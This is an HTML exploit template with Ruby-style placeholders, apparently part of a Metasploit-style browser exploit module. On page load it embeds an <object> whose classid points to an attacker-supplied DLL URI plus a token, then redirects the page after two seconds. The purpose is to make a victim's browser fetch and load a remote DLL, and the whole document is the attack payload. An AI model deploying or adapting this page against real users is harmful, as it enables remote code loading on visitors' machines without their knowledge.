<html>
<head>
<script language="javascript">
  function forward() {
    window.location = window.location + '?#{token}';
  }

  function start() {
    setTimeout("forward()", 2000);
  }
</script>
</head>
<body onload="start()">
  <object classid="#{dll_uri}?#{token}#GenericControl">
  <object>
</body>
</html>